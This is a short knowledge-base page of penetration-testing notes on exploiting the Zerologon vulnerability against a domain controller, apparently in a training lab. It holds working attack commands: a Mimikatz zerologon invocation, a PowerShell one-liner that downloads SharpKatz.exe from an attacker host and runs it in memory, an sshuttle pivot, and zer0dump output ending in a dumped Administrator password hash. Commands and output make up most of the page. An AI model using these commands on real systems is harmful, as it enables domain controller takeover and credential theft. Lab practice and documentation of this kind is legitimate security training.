Exploitation

Zerologon

The file found in JOE-LPTP told that there is zerologon vulnerability in DC0 controller
Exploiting it with different tools didn”t worked with proxychain.
Worked using sshuttel

Using secretsdump and Impacket

Using mimikatz

 
 
Mimikatz.exe "Lsadump::zerologon /target:lab.offshore.local /account:dc0$$ /exploit"

Using Sharpkatz

$data=(New-Object System.Net.WebClient).DownloadData('http://10.10.14.3:80/SharpKatz.exe'); $asm = [System.Reflection.Assembly]::Load([byte[]]$data); $out = [Console]::Out;$sWriter = New-Object IO.StringWriter;[Console]::SetOut($sWriter); [SharpKatz.Program]::Main("--Command zerologon --Mode auto --Target DC0.lab.offshore.local --MachineAccount DC0$ --Domain lab.offshore.local --User administrator --DomainController DC0.lab.offshore.local".Split());[Console]::SetOut($out);$sWriter.ToString()

using zerodump

 
sshuttle -v -e "ssh -i id_rsa" -r root@10.10.110.123 -N

python zer0dump.py 172.16.1.200 -target_machine=DC0
Namespace(port=445, silver=False, target='172.16.1.200', target_da=None, target_machine='DC0')
Performing authentication attempts...
172.16.1.200
DC0
=========================================================
Success! DC can be fully compromised by a Zerologon attack.
 
NetrServerPasswordSet2Response 
ReturnAuthenticator:
    Credential:
        Data:                            b'\x01\xd9\x9f.\xdd\x9e\x05=' 
    Timestamp:                       0 
ErrorCode:                       0 
 
 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8f6aaf1438d78c89c4636179e3ae18ea:::
aad3b435b51404eeaad3b435b51404ee:8f6aaf1438d78c89c4636179e3ae18ea

Alternate method if two DC are present

https://dirkjanm.io/a-different-way-of-abusing-zerologon/

Malleum Knowledge Base

Explorer

Exploitation

Zerologon

Using secretsdump and Impacket

Using mimikatz

Using Sharpkatz

using zerodump

Alternate method if two DC are present

Graph View

Table of Contents